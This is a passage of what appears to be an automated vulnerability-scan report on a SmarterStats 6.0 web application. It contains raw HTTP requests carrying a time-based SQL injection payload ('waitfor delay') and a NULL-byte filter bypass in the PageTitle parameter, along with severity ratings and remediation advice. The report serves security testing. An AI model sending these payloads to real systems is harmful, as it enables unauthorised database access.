ZpZXdJRAYPAAAADUxvZ09wdGlvbnNUYWILZAUZY3RsMDAkTVBIJGdyZExvZ0xvY2F0aW9ucw8FJFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXx8RmFsc2V8RmFsc2V8MGQFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0zDzLgCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAANQExvZ0xvY2F0aW9ucwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAAD0xvZ0xvY2F0aW9uc1RhYgtkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtNQ8y3AsAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BTZW9PcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAANU2VvT3B0aW9uc1RhYgtkBRJjdGwwMCROYXZQSCRwZ3JMb2cPBSJjdGwwMF9NUEhfZ3JkTG9nU3RhdHVzfDE2fDB8OXwyNXwwZAUZY3RsMDAkTVBIJFBhZ2VJZGVudGlmaWVyMQ8FIDY3MDZiNjFkOGZiODQwOGRiMGJkN2RhZjk5NTZlM2VjZAUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFhkFJGN0bDAwJE1QSCRjaGtTZW9FbmFibGVkX1NldHRpbmdDaGVjawUoY3RsMDAkTVBIJGNoa1N0cmlwQWZ0ZXJTZW1pX1NldHRpbmdDaGVjawVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQwBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDEFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMgVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQzBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDQFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNQVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ2BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDcFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkOAVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ5BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDEwBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDExBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDEyBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDEzBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE0BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE1BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE2BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE3BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE4BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE5BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIwBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIxBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIxBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMQ8y1gsAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBPcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBRZjdGwwMCRNUEgkZ3JkU2VvU3RhdHVzDwU6VHJ1ZXxUcnVlfHxUcnVlfFRydWV8bGFzdFByb2Nlc3NpbmdEYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW04DzLaCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQFNFT1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADFNFT1N0YXR1c1RhYgtkOM5P3EdqRgSfYoIjJCDTiv3sZp5ktoudiy8rNReMpN8%3D&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5)waitfor%20delay'0%3a0%3a20'--&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:14:15 GMT
Content-Length: 0


2.4. http://vulnerable.smarterstats.6.0.host:9999/Default.aspx [ctl00%24PageTitle parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Default.aspx

Issue detail

The ctl00%24PageTitle parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ctl00%24PageTitle parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /Default.aspx?section=UserDataMining HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Default.aspx?section=UserDataMining
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 1786

ctl00%24Split%24LP%24ctl01%24dtStart%24dateInput=555-555-0199@example.com&__LASTFOCUS=&ctl00%24PageTitle=%00'&ctl00%24Split%24LP%24ctl01%24dtEnd%24dateInput=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtEnd_ClientState=&ctl00%24Split%24LP%24ctl01%24ddChart=NONE&ctl00_Split_LP_ctl01_dtStart_calendar_SD=%5b%5d&ctl00%24Split%24LP%24SessionKey=275a2fda26bf41d0a434458863c81036&ctl00%24Split%24LP%24ctl01%24dtStart=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtStart_dateInput_text=555-555-0199@example.com&ctl00%24Split%24LP%24ctl01%24ddQuery=INT_DailyActivity&__EVENTTARGET=&ctl00%24PanelLoadedState=%7b%7d&__EVENTARGUMENT=&ctl00_Split_LP_ctl01_dtStart_calendar_AD=%5b%5b1800%2c1%2c1%5d%2c%5b2200%2c1%2c1%5d%2c%5b2010%2c10%2c9%5d%5d&ctl00_Split_LP_ctl01_dtEnd_calendar_SD=%5b%5d&ctl00%24Split%24LP%24ctl01%24ddRows=25&ctl00_Split_LP_ctl01_dtStart_dateInput_ClientState=&ctl00_Split_LP_ctl01_dtEnd_dateInput_text=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtEnd_calendar_AD=%5b%5b1800%2c1%2c1%5d%2c%5b2200%2c1%2c1%5d%2c%5b2010%2c10%2c9%5d%5d&ctl00_Split_LP_ctl01_dtStart_ClientState=&ctl00%24Split%24LP%24ctl01%24ddFilter=32A21FBCC3ED4d24A2E81ABB427296FC&__VIEWSTATE=%2fwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBgUcY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydAUlY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydCRjYWxlbmRhcgUl